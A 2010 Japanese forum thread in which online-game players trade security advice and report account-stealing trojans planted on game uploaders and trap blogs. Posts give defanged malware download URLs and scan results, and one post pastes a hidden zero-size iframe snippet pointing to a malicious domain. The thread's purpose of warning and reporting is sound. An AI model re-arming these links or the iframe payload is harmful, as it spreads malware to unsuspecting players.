自分でも思っているのは手っ取り早くPeerBlockでブロックできるならそのほうが楽だなあと。

現在は違いますが最近まで当方の環境にあったPentium3のhostsリスト(行数28k)では
膨大なリスト数でウイルスバスター2010の監視設定を閲覧した際に処理が終了せず
スクリプト処理が停止の可否を尋ねられりしたので、通常使っている分には問題ないみたいですが
もしかするとアンチウイルスソフト絡みで処理が遅れている可能性がありそうです。

ネット閲覧については最低限の環境で重いけど見られない事は無い環境で慣れ切ったので
重いのが当たり前で…。こればかりは返答しにくいです。 <> (○口○*)さん<>sage<>10/04/18 23:52 ID:Y3LB6omA0<> hostsファイルを除外設定すれば、もしかして効果あるのかも? <> (○口○*)さん<>sage<>10/04/18 23:55 ID:lk6cWy/j0<> まとめの人が謝罪する必要はまったくないと思う
ただ、単純に全部hostsに書くのは色々間違ってる気がするので、
その辺うまいこと運用する方法はないもんかねぇ <> (○口○*)さん<>sage<>10/04/19 02:57 ID:UIxvNIM60<> 有志が上から順番にドメイン失効しているかどうか調べて
○○〜○○まで×/××調査済み って感じで上書きしていくしかないと思う
再復活しているようなら追加、となるとまとめの人のチェック作業が増えちゃうのかどうか

PG2かPBで弾けるものはhostsから除外してしまうという手もあるけど
それだと、hostsオンリーの人に対して緊急性が失われてしまう
いちおうシステムファイルの1つだからスリム化させるのがベターなんだろうけどもね <> (○口○*)さん<>sage<>10/04/19 04:12 ID:9DBursLN0<> hostsファイルって正規表現は使えたんだっけ。
ソートしてみたら一部だけが違うようなドメイン名が結構あるので、
それでまとめられないかなと思ったりしたんだけど。

というか起動後にhosts書き換えられたら意味がないわけで、
一案としてPG用リスト形式で提供するのもいいのかなと。
…管理人さんの手間が増えるか。
スレ全体で何とかバックアップできるといいんだけど。 <> (○口○*)さん<>sage<>10/04/19 07:27 ID:8U7n6P6W0<> 使えない。
*.google.com
みたいなのも不可(サブドメイン全部要る)。 <> (○口○*)さん<>sage<>10/04/20 08:49 ID:duVq7I8K0<> >>774
プロキシサーバ用意してSquidで拒否設定入れてるけど体感するほど遅くない。
退役PCが発生するのであれば検討してみてはいかが <> (○口○*)さん<>sage<>10/04/20 19:56 ID:MBomYjXg0<> ●怪しいアドレスを踏んだ時の報告用
【不審なアドレスのクリックの有無 】 ttp://aimeblog■com/down/uproda016258■jpg
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 Windows7
【使用ブラウザ 】 Sleipnir Ver2.9.3
【WindowsUpdateの有無】 4月中旬頃のWindowsUpdateが最後
【 アンチウイルスソフト 】 Microsoft Security Essentials ver1.79.2131.0
【その他のSecurty対策 】 無し
【 ウイルススキャン結果】 無し
【スレログやテンプレを読んだか】 Yes
【hostsファイルの変更】無
【PeerGuardian2の導入】無
【説明】 現在課金はしていないので今所の被害はなし
画像を開くと
 html>
 <center><img src="http://www■4gameranking■com/tupian/maple■jpg"></center>
 <iframe src="http://www■4gameranking■com/xin/" width="0" height="0" frameborder="0"></iframe>
 <html>
と文字列が表示されていました。
<html>となっていないため直リンクという形にはなっていなかったようなのですが
念のためPCのリストアなどを行った方が良いのでしょうか? <> (○口○*)さん<>sage<>10/04/20 20:27 ID:/toIXZYD0<> 大丈夫じゃね? 保障はしないが。 <> (○口○*)さん<>sage<>10/04/20 21:11 ID:0ziyFBLv0<> Registrant:
Organization : chen gzhibing
Name : chen gzhibing
Address : xin luo
City : long yan
Province/State : FJ
Country : cn
Postal Code : 364000

ソース表示されたのならだいじょうぶだと思うが <> (○口○*)さん<>sage<>10/04/20 21:37 ID:WN6RG3OK0<> aimeblogは真っ黒ドメインだね
そのURLでぐぐったらそこら中でてきたわ
コピペ爆撃しまくってる模様 <> (○口○*)さん<>sage<>10/04/20 21:45 ID:WN6RG3OK0<> URLっていうかファイル名で十分だった
メープル、ROがメインで他も少々か
エミュ鯖っていう単語も狙ってる感じだね <> (○口○*)さん<>sage<>10/04/20 22:18 ID:x9whOxhe0<> AVGにてウイルス検査したら 「FakeAlert.RO」と言うトロイの木馬が
出てきたんですけど、RO関係あるかどうかご存知の方いらっしゃいますか?
そのようなアラートは出ていないけど‥どうにも気持ち悪いです。 <> (○口○*)さん<>sage<>10/04/20 22:26 ID:/ASdafRx0<> >>809
それはRO関連のなんとかじゃなくて、FakeAlertの亜種番号がROってものです。

偽りの警告で、偽セキュリティソフトを買わせようとしたり、フィッシングサイトへ誘導しようとするような代物と思われます。
本当のところは、その検出名でぐぐれ。 <> (○口○*)さん<>sage<>10/04/20 22:30 ID:y8zNWuDn0<> >>805-807
なるほど
現状はとりあえず様子を見つつ、
精神衛生的にROやる時になったらPCのリストアをしてみようと思います。 <> (○口○*)さん<>sage<>10/04/20 22:31 ID:x9whOxhe0<> >>810
もう、ROってついてるだけでガクブルでした。
検出名で検索するも、出てくるのは海外のページばかりで焦ってしまい
ここに頼る脳しかなかったです。

有難うございます、ひとまず安心しました。 <> (○口○*)さん<>sage<>10/04/20 23:23 ID:WN6RG3OK0<> >>812
RO関係ないけど安心していいものではないよ
PC使ってて意味のわからん警告とか出ない?

日本語の説明サイト
http://itpro.nikkeibp.co.jp/article/COLUMN/20090608/331401/ <> (○口○*)さん<>sage<>10/04/21 00:39 ID:miAPYsgt0<> >>813
今の所は警告等出ておりません。
隔離のみはしてますが、削除方法調べてみます。
アドバイス有難うございました、嬉しかったです。 <> (○口○*)さん<>sage<>10/04/21 01:43 ID:0l/rRWLQ0<> AVGといえばエグザイルのメンバー(誰か忘れた)のサイトにアクセスしたら警告が出てたな <> (○口○*)さん<>sage<>10/04/21 07:46 ID:ccAkIu2m0<> 福建中華の罠ブログ
ankokunonakanomini■blog21■fc2■com

中身空っぽでブログ最上部に以下のIFRAME
infosueek■gotoip2■com/xin

gotoip2は中国サービス、偽ブランドSPAMなどでも使われているらしい。

他バリエーションで
aiongamemeca■gotoip2■comを確認。

この傾向から以前取得した罠ドメインをサブドメイン名で使ってくるであろう。
油断大敵、気をつけてくれよな! <> (○口○*)さん<>sage<>10/04/22 14:29 ID:Vday/SjZ0<> McAfeeにPCが再起動ループに陥る不具合、「svchost.exe」誤検知
http://internet.watch.impress.co.jp/docs/news/20100422_362952.html <> (○口○*)さん<>sage<>10/04/22 14:35 ID:7VdEw3i90<> フジテレビのPCでも再起動しまくるとか言ってたやつってこれなの?
最近セキュソフトのテロ流行ってるの? <> (○口○*)さん<>sage<>10/04/22 15:59 ID:wqs1pQcE0<> アナウンサーが「原稿手書きで…」とか言っててワロス <> (○口○*)さん<>sage<>10/04/23 10:19 ID:vnaOJRiW0<> 915 名前:(○口○*)さん[sage] 投稿日:10/04/21(水) 15:55 ID:6q/ZTvSu0
>>912
丁度自分も引いてこれで全部っぽいですね・・・協力してくれた皆様ありがとうございました
これで後はアマツの財宝を掘りつくすのみで・・・後370回もあるよ・・・
座標別:ttp://sns.gungho.jp/ro/img.php?filename=d_3077_1_1271831893.jpg&m=pc
逆引き:ttp://sns.gungho.jp/ro/img.php?filename=d_3077_2_1271831859.jpg&m=pc
五十音:ttp://sns.gungho.jp/ro/img.php?filename=d_3077_3_1271831893.jpg&m=pc
クエWiki入力用:ttp://www.mmobbs.com/uploader/files/8597.zip

これってアカハク?
上三つは何も表示されなかった <> (○口○*)さん<>sage<>10/04/23 10:25 ID:bv8nE7jK0<> >>820
ROSNSみたいだからウィルスではないと思う
>■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■
だしアカハックだと思うのならキチンと.を■に置き換えて下さい <> (○口○*)さん<>sage<>10/04/23 10:35 ID:O9RB8vgn0<> ttp表記でも、リンク先が画像だと表示しちゃうブラウザがあるんで配慮があると助かる <> (○口○*)さん<>sage<>10/04/23 19:27 ID:XRAb5TKe0<> >>820
うっかり開いちまったじゃねーかボケ <> (○口○*)さん<>sage<>10/04/23 19:29 ID:Gqz71nkT0<> 820は中華 <> (○口○*)さん<>sage<>10/04/23 19:53 ID:uteORYCY0<> はいはい危険危険

http://sns.gungho.jp/はラグナロクオンラインSNS
http://www.mmobbs.com/uploader/はMMOBBSアップローダー

共にトレジャーハンタークエストをやっていないなら無関係、やっていたらお世話になるであろう情報
自分がいつも行くところの危険度が分からないならネットはしない方がいいよ <> (○口○*)さん<>sage<>10/04/23 19:59 ID:vDhGZmnn0<> ちょいと質問をば

WindowsHomeServerを導入しようと思ってるんだけど、ざっと調べた所
これに対応してるウイルス対策ソフトってカスペとAvastのWHSエディション位しか
見当たらない状態
選択肢がほとんどない状況だけど、選ぶとすればどっちが良いでしょう? <> (○口○*)さん<>sage<>10/04/23 22:58 ID:cwSry4Jw0<> 好きな方で <> (○口○*)さん<>sage<>10/04/23 23:04 ID:2dCiywQe0<> 用途に合わせてご自由に <> (○口○*)さん<>sage<>10/04/27 00:46 ID:J6va/cJH0<> 書き込みがないと不安になる

SNSのアカハックURLが絶えないなー
貼り付けてるのはアトラクションIDを量産してるやつだと思うんだけど、
癌IDに紐づいてるならとっととBANしてしまえばいいのに <> (○口○*)さん<>sage<>10/04/27 01:18 ID:pBhXs3QU0<> >>829
運営に報告しろよ&どんなアドレスがどんな文面で貼り付けられているのかここに(危険URLは置き換えて)転記 <> (○口○*)さん<>sage<>10/04/27 01:59 ID:J6va/cJH0<> 転記するまでもなくたくさんあったんだよー
ほとんど全部うpろだへのリンク(しかも同じファイル)

通報は最初やり方がわからなかったのでスルーしてた
ごめん
画面最下部に「通報窓口」ってのがあるからそれ使えばいいみたい <> (○口○*)さん<>sage<>10/04/27 02:07 ID:0qnGr63a0<> >転記するまでもなく
誰もがそれを見ている訳じゃないんだから <> (○口○*)さん<>sage<>10/04/27 04:26 ID:oDxHXy6j0<> 一回も赤ハックをみたことないんだよね。 <> (○口○*)さん<>sage<>10/04/27 08:29 ID:rbN51scq0<> 同じく公式SNSでは見たことがない <> (○口○*)さん<>sage<>10/04/28 11:24 ID:/5DHs7f00<> 今日の朝方、福建一味によりうpろだ.tvに投下されていたもの
2010/04/28(Wed)07:03
http://www■uploda■tv/v/uptv0066486■zip

ものはClamAVで検出できる程度。
uptv0066486■zip: Worm.Mytob-73 FOUND
TalesWeaver_original■mov■exe: Worm.Mytob-73 FOUND

実効ファイルをVirSCANで調べたところ、シマンテック、トレンドマイクロは検出するも
マカフィー、カスペ、F-Secure検出せず。
http://www.virscan.org/report/1e311755c2b7762fbf40fe6026bd7132.html

カスペ回避型かな?
これからGW、気をつけてくれよな! <> (○口○*)さん<>sage<>10/04/28 18:57 ID:iyglhisG0<> ↑7-zipで解凍するとmxd.exeが出てくる。
infected by Trojan.Win32.Scar.cari (Kaspersky) <> (○口○*)さん<>sage<>10/04/29 09:22 ID:ZqVii4fA0<> 835のあと、17時ごろに再び投下されていた。
www■uploda■tv/v/uptv0066500■zip

clamavで検出できず、mxdは検出結果が異なるため別のもの。
www.virscan.org/report/3430b3ed84f7d6ea8e4d07a574399385.html
Trojan.Win32.Pincav.xai(Kaspersky)

おおよそのものは検出するけど、マカフィーは相変わらず。 <> (○口○*)さん<>sage<>10/04/30 13:56 ID:dVbC1FV70<> 13:16前後のネトゲ質問板で確認
すでに100以上DLされてる
loda■jp/prius/?id=1175■lzh

コメントは「BOSS出現場所チェック入り」
管理人には連絡済

NOD32以外は検出かな
http://www.virustotal.com/jp/analisis/ce158e4cd06bbe76c77167a0ea3a6698c46187d48e808d94543d8ddcd418111a-1272602459 <> (○口○*)さん<>sage<>10/04/30 14:04 ID:oMfJ704V0<> prius online用のアップローダーかw <> (○口○*)さん<>sage<>10/04/30 14:06 ID:dVbC1FV70<> loda.jpいろいろ狙われとるねえ
ネトゲ名+loda.jpで検索しとるんじゃなかろうか <> (○口○*)さん<>sage<>10/04/30 14:10 ID:LOBdWzkG0<> 100以上DLされてるってどういうことだ・・・www
明らかに怪しいだろ <> (○口○*)さん<>sage<>10/04/30 14:15 ID:oMfJ704V0<> 本当にダウンロードしているのか不明だけどな

ここに乗ってから10分で10以上カウント進んでるしw <> (○口○*)さん<>sage<>10/04/30 14:32 ID:Z1tKl6cK0<> 自演DLだろうな。造作もない。 <> (○口○*)さん<>sage<>10/04/30 14:51 ID:LFVfMS210<> パスなしは軒並み3桁いってるみたいなんでほいほい釣られてる予感
NOD32提出しときました <> (○口○*)さん<>sage<>10/04/30 15:08 ID:Xh9pROcv0<> 最近の報告にあるのと同じ、zip→exe→mxd.exe というパターンだね。 <> (○口○*)さん<>sage<>10/04/30 19:05 ID:4c/dBx420<> 先日トールで垢ハックされたと思われるMVPAXカードが65Mで露店売されてたし、
まだ安易に踏んじゃうのはいるようだね。気をつけんと。 <> (○口○*)さん<>sage<>10/05/02 18:34 ID:6kl3rH2k0<> そいえばRJCで販売されたOTPカードトークンって
どのタイプなんだろ? <> (○口○*)さん<>sage<>10/05/02 18:38 ID:fwZpx5Bx0<> >>838
DL数400突破した
連絡したけど消されてないし放置されてるのかも <> (○口○*)さん<>sage<>10/05/02 18:45 ID:y4HR5Ou/0<> そこは管理人は(たぶん)居ないよ
Wikiの方も同じ人だと思うけど不在だし <> (○口○*)さん<>sage<>10/05/02 21:11 ID:4B/wZuvp0<> >>847
どのって、どういう意味? <> (○口○*)さん<>sage<>10/05/06 18:17 ID:EZqo3p0s0<> >>846

・・・アカハックさんぱねぇぜ・・・ <> (○口○*)さん<>sage<>10/05/08 22:18 ID:/MyB15L60<> RO板のアカハック削除依頼が幾つか出てたけど、アドレスどこだったんだろう?
報告の上がってるものと重複してるのならいいのだけど。 <> (○口○*)さん<>sage<>10/05/08 23:33 ID:XXy2JSGS0<> 動画紹介で拡張子がlzhだったのは覚えてるけど紹介文やURLまでは覚えてないです <> (○口○*)さん<>sage<>10/05/09 09:13 ID:yR5B97+Y0<> ねーねー
この手のZIPだのLZHだのって、何で出てきたexeを不用意に実行しちゃうわけ?
それとも、exeが勝手に実行されちゃうような脆弱性を突かれてるの?
(解凍ソフトとかの)

つまり、踏んでる人はexe実行に注意が足りない人って認識でいいの?
それとも暗にexeが実行されるような仕組みが別にあるのかな。
(PDFの外部アプリ起動とか)

偽装ZIPとかの知識がある人ならそもそも踏まないような罠なのか、
注意してても踏んでしまうような罠なのか、どっちなんだろう。 <> (○口○*)さん<>sage<>10/05/09 09:58 ID:k6Pb/NO10<> 中身を勝手に実行しちゃうような罠だったら、P2Pなんかでもっと大事になってそうな気もするけど
実際どうなんだろうか <> (○口○*)さん<>sage<>10/05/09 11:27 ID:pZS4gGzf0<> >>854
そこに実行ファイルがあるからだろう <> (○口○*)さん<>sage<>10/05/09 11:36 ID:yR5B97+Y0<> >>856

んや、「何だろう」って不用心にも実行してしまうような、ユーザの操作の過失じゃなくてね。
ZIPやLZHを解凍すること自体に危険があるのか、ってことね。 <> (○口○*)さん<>sage<>10/05/09 11:59 ID:K8EYlUEJ0<> >>857
解凍方法にもよるのでなんとも言えない。基本的には解凍だけならOK。

但し、拡張子偽装だの、マウスボタンのチャタリングで誤実行だのもあるし、リムーバブルメディアに解凍して
他にもってったら自動実行されるとか危険性はいくらでもある。

セキュリティ的には、ダウンロードを試みる時点で運用的にはアウトと思ってた方がいい。 <> (○口○*)さん<>sage<>10/05/09 12:03 ID:K8EYlUEJ0<> 参考までに、解凍するだけで問題が出るような事例について知りたければ、この辺を読んどいてくれ。

LZH 書庫のヘッダー処理における脆弱性について (2010 年版)
ttp://www2.nsknet.or.jp/~micco/vul/2010/mhvi20100425.htm <> (○口○*)さん<>sage<>10/05/09 12:04 ID:pZS4gGzf0<> 去年だったか一昨年にlzhとzipの解凍アプリで何かの脆弱性があったな
勝手に実行される類かどうかは忘れたが

こういうツールはずっと古いバージョンのまま放置されやすいな <> (○口○*)さん<>sage<>10/05/09 12:28 ID:2nojFdm60<> 最近は無いと思うが、昔は解凍先を任意に指定できてしまうことを
利用したものもあったな。 <> (○口○*)さん<>sage<>10/05/10 09:10 ID:bZb0lag10<> 鯖板に日記だと書いてあって↓のやつを踏んだら
自分のアトラクションセンターに繋がったのですがこれは大丈夫なんでしょうか?
ttp://sns.gungho.jp/ro/?m=pc&a=page_f_home&target_c_member_id=12898 <> (○口○*)さん<>sage<>10/05/10 09:12 ID:VReqtNYf0<> うるせー馬鹿 <> (○口○*)さん<>sage<>10/05/10 09:24 ID:QLh/4JWa0<> >>862
ttp://www.youtube.com/watch?v=Sbt7O5IiMZA
ttp://www.youtube.com/watch?v=ckcTef3cM0E <> (○口○*)さん<>sage<>10/05/10 09:43 ID:bZb0lag10<> >>864
えっと、大丈夫ってことでいいのかな?
とても不安だったので助かりました、ありがとうございます。 <> (○口○*)さん<>sage<>10/05/10 19:55 ID:9TMmYAhN0<> KIS2009の更新期限が近くなったのでライセンス更新しようと思ったら、2009用更新キーの販売が終わってたorz

KIS2010はROと相性がよろしくないような話を前にここで読んだので、更新しようか乗り換えようか迷っています。
2010を使っている人にお聞きしたいのですが、今はROとの相性はどんな感じなのでしょうか?
ちなみに2009では、PT窓やアイテム窓を開いたまま移動したりするとガクガクする事が気になっていたけど、他は特に不満は無かったです。
2009の設定は
・プロアクティブディフェンスでキーロガー検知OFF
・ROのクライアント関連ファイルとnPro関連ファイルを「脅威と除外」の除外設定および「システム監視」で信頼済み設定
程度でした。

参考にしたいので、よろしくお願いします。

一応、テンプレ抜粋して埋めておきます。
【     OS    】 Windows XP SP3
【使用ブラウザ 】 Firefox 3.6.3 Internet Explorer 8 (ROにログインする時のみ使用)
【 アンチウイルスソフト 】 Kaspersky Internet Security 2009 8.0.0.454
【その他のSecurty対策 】 Spybot BitDefenderコマンドライン版
【hostsファイルの変更】 有
【PeerGuardian2の導入】 有 <> (○口○*)さん<>sage<>10/05/10 20:53 ID:E+aAGVIJ0<> ROが動いたとしても他のネトゲが動かないとかよく耳にするし推奨はしない <> (○口○*)さん<>sage<>10/05/10 22:20 ID:DssoEZ+q0<> KIS2009から2010にしたけど特に変わらないよ <> (○口○*)さん<>sage<>10/05/11 00:38 ID:el4HVsGx0<> >>866
少なくともうちの環境ではCF2になって以前よりは随分安定してる
ただやはり相性問題は起こりやすい方だと思うから自己責任になる

あと普通に2010買ってきてキーを入れるだけで普通に2009を更新できたはずだけど
その代わり2009だと1つのキーで1台しか使えないけどね
ただ今はキャンペーンで、キーではなく箱で買って登録したらもう1年分キーが貰えるよ <> (○口○*)さん<>sage<>10/05/11 00:54 ID:BYa6J1C50<> 2010プログラムへ無償バージョンアップし、2010更新キーをご購入・アクティベーションをお願いいたします。
※2010更新キーは、2009以前のプログラムでは適用いただけません。

って注意書きがあるけど? <> (○口○*)さん<>sage<>10/05/11 02:00 ID:V9PfnPjd0<> KIS10使ってるけど、別に問題は起きてないな。
Ragnarok.exeとRagexe.exeがキーロガー判定されたりしたが、除外設定すれば済む話だし。 <> (○口○*)さん<>sage<>10/05/11 02:05 ID:el4HVsGx0<> >>870
じゃあ変わったんかね

うちでサブが2010に完全移行したのは3ヶ月前だったかな?
それまでは2010のキーがそのまま通ってたからそのままだと思ってた <> (○口○*)さん<>sage<>10/05/11 06:44 ID:bvNcvYP2O<> すいません質問なのですがAviraのフリー版て誤検出あります?

今、初期化後にROぐらいにしか使用してないノートでROしてたらいきなり

【Guard、マルウェアが検出されました】

【ウィルスまたは不要なプログラム.TR/Dldr.Hmir.xmg[trojan]
がファイルC:\Program FILES\RISING\RFW\UPDATE\RFWBASE.SYS】で検出されました。
と出てパニくってます。

トロイとか書いてあるし。


@niftyオンラインスキャンでは異常ありませんでした。

やはりまたアンインスコしなおすしかないですかね? <> (○口○*)さん<>sage<>10/05/11 11:51 ID:SPg8lGkX0<> そこまで不安ならまずは
Avira 誤検出
あたりでググれカス <> (○口○*)さん<>sage<>10/05/11 15:22 ID:d+58NVUy0<> >>873
誤検出のないセキュリティソフトなんてないだろ。不安なら、該当ファイルをAviraに提出して確認して貰え。
ファイル名からして、RisingのFWに見えるが、まさか、セキュリティソフトを複数入れてたりはしないだろうな。 <> (○口○*)さん<>sage<>10/05/11 18:00 ID:kW791+Zq0<> >>873
無料セキュリティソフトは自分でなんとかできない人には向かないよ
電気屋さんで有料製品を買ったがいい <> (○口○*)さん<>sage<>10/05/11 20:25 ID:dWpSxN8k0<> そして安い、たくさん並んでいるという基準でウイルスセキュリティZEROをインストール

これ以上は言わせんなよ! <> (○口○*)さん<><>10/05/11 20:51 ID:HtIWwzd30<> まあこっちのも瑞星Risingだからね…… <> 866<>sage<>10/05/12 01:30 ID:wI9rcsFG0<> >867-872

とりあえず現状では、ネトゲはROしかやる予定が無いので、2010に更新してみたいと思います。
キャンペーンもまだやってるみたいなので、もし相性が悪ければ、キャンペーンで貰えるキーで別のPCに2010を入れることにします。
ありがとうございました。 <> (○口○*)さん<>sage<>10/05/12 06:15 ID:VqKebWv60<> どのソフトだっけ
「ネットに繋がらなくなるからウイルス対策は完璧です!」
ってサポートの中の人さえ公言しちゃってたやつw <> (○口○*)さん<>sage<>10/05/12 07:01 ID:jNHgT8x90<> FWで通信途絶したesetじゃね <> (○口○*)さん<>sage<>10/05/12 08:11 ID:vfu1ON920<> バスターも急にネット繋がらなくなって乗り換えたことがあったな・・・ <> (○口○*)さん<>age<>10/05/12 08:32 ID:vWK7ru1t0<> 公式ブログ見たけど、カード型トークンはイベントでしか販売しない模様
イベントに行かなければ売らないって事は脅迫ですか?
癌畜以外のユーザーは死ねって事ですか? <> (○口○*)さん<>sage<>10/05/12 08:37 ID:kX5gHJR40<> うん、それでしんじゃうならしんで <> (○口○*)さん<>age<>10/05/12 09:37 ID:0pY60cVo0<> 今月も、WindowsUpdateを忘れずに <> (○口○*)さん<><>10/05/12 10:13 ID:yXQTf9Ma0<> 月例age
計2件(緊急2)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms10-may.mspx
ttp://blogs.technet.com/jpsecurity/archive/2010/05/12/3331950.aspx

その他

ESET Smart Security / NOD32 Antivirus
LZH Processing Denial of Service
Release Date 2010-05-10
ttp://secunia.com/advisories/39736/ <> (○口○*)さん<>sage<>10/05/12 14:31 ID:yux87zhf0<> 福建中華により2ちゃんのアラドスレに投下されていたもの。
またしてもloda.jp悪用

loda■jp/prius/?id=1187■zip
展開するとscrファイル5個>mxd

5個あるうちの1番目のmxdを調べる。
http://www.virustotal.com/analisis/273c328970cd47826ac7864ede4a7491d8dce093f891a0f7bdad290a89cb787f-1273641947

mxdは従来のと異なるので新型と思われる。
メジャーどころではAvast、NOD32、マカフィーのみが検出。
カスペ回避型か。

他のネトゲではパスワードリマインダ悪用してハックをしているとか。
今回みたいにトロイ複数詰め込んだりホントなりふり構わずになってきているな。

気をつけてくれよな! <> (○口○*)さん<>sage<>10/05/12 21:48 ID:jNHgT8x90<> ↑AntiVir BitDefender Dr.WEB Kaspersky Norton Panda Sophos バスターに発射しました。 <> (○口○*)さん<>sage<>10/05/12 23:14 ID:FlRRh7Pj0<> おつかれさまです <> (○口○*)さん<>age<>10/05/13 06:37 ID:xUXTe3yB0<> Adobe、「Shockwave Player」の脆弱性修正版を公開
http://internet.watch.impress.co.jp/docs/news/20100513_366563.html

アップデートどころか、最近は、OSの入れ直しの後に、Shockwave Playerは入れることすらなくなってるなぁ。
入ってることすら忘れてる人は要注意。 <> (○口○*)さん<>sage<>10/05/13 06:38 ID:xUXTe3yB0<> >>887
>888の提出以外のマイナー所にも一通り提出完了。 <> 888<>sage<>10/05/13 20:12 ID:tR0o5nvq0<> ttp://www.virustotal.com/analisis/273c328970cd47826ac7864ede4a7491d8dce093f891a0f7bdad290a89cb787f-1273748766
主だったとこでは Norton Microsoft バスター AntiVir がまだ。 <> (○口○*)さん<>sage<>10/05/13 20:21 ID:tR0o5nvq0<> ついでにwiki編集しても反映されなかったのでここに。

Microsoft (OneCareの表記はSecurityEssentialsに要変更)。今は転送される。
ttps://www.microsoft.com/security/portal/Submission/Submit.aspx

Sophos
https://secure. (略)に変更。今は転送される。

Malwarebytes
フォーム消滅。フォーラムに貼れということらしい(要アカウント)

Kingsoft 中文
ttp://www.pc120.com/fileident/
(疑似病毒文件を選択。誤報文件は誤検知の場合に選択)

Rigins(キラー) 中文
ttp://mailcenter.rising.com.cn/FileCheck/
(CAPTCHAあり) <> (○口○*)さん<>sage<>10/05/13 21:09 ID:tR0o5nvq0<> Risingだった orz <> (○口○*)さん<>sage<>10/05/17 07:33 ID:otMsf0Lh0<> ノートンがWoWを誤検知
ttp://isc.sans.org/diary.html?storyid=8803 <> (○口○*)さん<>sage<>10/05/18 03:12 ID:8Jxxl+zd0<> wow64かと思った <> (○口○*)さん<>sage<>10/05/19 08:30 ID:sl5wMCmD0<> またしてもAIONのろだに置かれていたもの。
loda■jp/aion/?id=4598■zip

zip > scr > (exe?)
7-Zipで展開時”scrのCRCが違う、ファイルが壊れている”とエラーを出すのでscrまでしか確認できなかった。

*出てきたscrをVirScan
http://www.virscan.org/report/6b52b988da03487fbe4edfccf4a4426f.html

バックドアものらしいがこの時点で殆どのものが検出できていない。
メジャー物は全滅といっていいくらい。

気をつけてくれよな! <> (○口○*)さん<>sage<>10/05/19 10:55 ID:7wB7IPjn0<> >>897
今回のはヘッダ破損で基本的には解凍できない(筈)だし、壊れているファイルで動作するかは不明だねぇ。
CRCエラーのものを下手に提出して、動作しないもの扱いでパターンから除外されるのもなんだし。

壊れてないファイルが検体として拾えるまで保留かな。

ZIP(5/41)
http://www.virustotal.com/analisis/0fc3d022132b7231be40ba68b9fa1bd56a20318ec2f923c1bc802b60dfab762e-1274233166

scr(6/39)
http://www.virustotal.com/analisis/30abb2d036a55508df9bc069c6530d8e9cdac08c5e7e8c8d0c678096b9c24e4c-1274233330 <> (○口○*)さん<>sage<>10/05/19 13:25 ID:CGRW/DUl0<> 本家のunrar.exeやunrar.dllで解凍不能。放置でいいかと。 <> (○口○*)さん<>sage<>10/05/19 14:31 ID:CGRW/DUl0<> Priusロダのは解凍できた。
loda■jp/prius/?id=1191.rar
loda■jp/prius/?id=1192.zip
loda■jp/prius/?id=1193.zip
rar→scr→SVCHIOST.exe (exeは3つとも同一)
ttp://www.virustotal.com/analisis/a9e8bbbd972cfdcca1e9009b0a65e19464c6f67c9109fd6d56433fb0d93d45c7-1274246737 <> (○口○*)さん<>sage<>10/05/19 14:35 ID:ZT3UzMfG0<> 大規模で別のうpろだへの投下を確認
2010/05/18(火) 21:07:11 ID:SL/rjnJ4
【RED】続テイルズウィーバーのRPG作ろうとしている動画
sophia-create■com/up/src/file0055■rar

scr(14/41)
http://www.virustotal.com/jp/analisis/c44127862a327d9ba9d5846c7a7e0c420847d9901cc436fbf2e86e950c4682de-1274246217 <> (○口○*)さん<>sage<>10/05/19 14:37 ID:ZT3UzMfG0<> >>900の1191.rarと同じっぽいわ <> (○口○*)さん<>sage<>10/05/19 15:13 ID:CGRW/DUl0<> AntiVir avast! Jiangmin Kingsoft Microsoft
Panda Rising Sophos Symantec Trendmicro に提出。 <> (○口○*)さん<>sage<>10/05/19 20:11 ID:CGRW/DUl0<> 再検査
ttp://www.virustotal.com/analisis/a9e8bbbd972cfdcca1e9009b0a65e19464c6f67c9109fd6d56433fb0d93d45c7-1274267217
AntiVir avast! Panda Rising が追加で検知。
シェアが大きいノートンやバスターはまだ。 <> (○口○*)さん<>sage<>10/05/19 20:25 ID:355OZ0jh0<> おつです
Avira個別番号っぽいねえ
亜種きたらダメかもなあ <> (○口○*)さん<>sage<>10/05/19 20:46 ID:CGRW/DUl0<> 前(mxd)からそうだけど、亜種でコードが大幅に変わるので
ジェネリックな検出はあきらめたほうがいいかと。 <> (○口○*)さん<>sage<>10/05/24 00:16 ID:FJoAaWTa0<> 前の騎士WikiがURLそのままで
ブログになってるけどこれは単純に別の人がそこで新しくブログしてるだけかな? <> (○口○*)さん<>sage<>10/05/24 00:44 ID:/OXtim3U0<> >>907
本人が自分のブログで違うって書いてる

B2HS
ttp://b2hs.netgamers.jp/

ここの3/23付け最新記事
危険性を指摘してるよ <> (○口○*)さん<>sage<>10/05/24 00:53 ID:FJoAaWTa0<> ありがとう、一応スキャンしておくことにするよ <> (○口○*)さん<>sage<>10/05/24 07:49 ID:hoejDc3+0<> 今アプリ型のトークンが入っている携帯を下取りにしてiPhoneに乗り換える事になったんだが
カードトークン何故限定発売なんだ・・・ <> (○口○*)さん<>sage<>10/05/24 07:53 ID:QFDfqLMh0<> そんな事いわれてもな <> (○口○*)さん<><>10/05/25 07:47 ID:UNqZmHkiO<> 重要なのはパスワードとセキュリティであって、IDはあまり関係ないですよね?

IDを登録した時ローマ字のみにしてしまい、いつハックされてしまうかオロオロしている毎日です… <> (○口○*)さん<>sage<>10/05/25 08:51 ID:ULcFwBFk0<> アプリ型よりカードトークンの方が便利杉 <> (○口○*)さん<>sage<>10/05/25 11:28 ID:oGUDQTVG0<> >>912
ガンホーのIDは変更できた気がするから、気になるなら変更してみたら・・・?
勘違いだったらごめんね <> (○口○*)さん<>sage<>10/05/25 14:11 ID:6RQEjQHr0<> >>912
IDはたしか1回だけかえれるよなー <> (○口○*)さん<>sage<>10/05/25 14:33 ID:ki/umt2h0<> その変えられるというのも随分前からの話で、
最初は確か一年間の期限付きだったが無期限になった。

このこと自体を知らない人が多いんだろうな。 <> (○口○*)さん<>sage<>10/05/25 15:00 ID:J03ael6E0<> 確かに、IDもPassも、複数の文字列を混ぜた方が総当たりされる時のリスクは下がるが
そんなことよりも、IDとPassの管理をしっかりした方がいいんだぜ。

気にするようなもんじゃねーよ。 <> (○口○*)さん<>sage<>10/05/25 15:41 ID:CcNihARQ0<> 福建中華の動きが再び活発になってきた

悪用してきた先の運営が忘れただろうと思ったかGeocitiesと中文のFC2ブログの作成を確認。

後者はいつもの記事なしIFRAMEトラップで、先に通報済み。
前者はこんなやつ、こっちもindexなしで単なるトロイ置き場、通報済み。
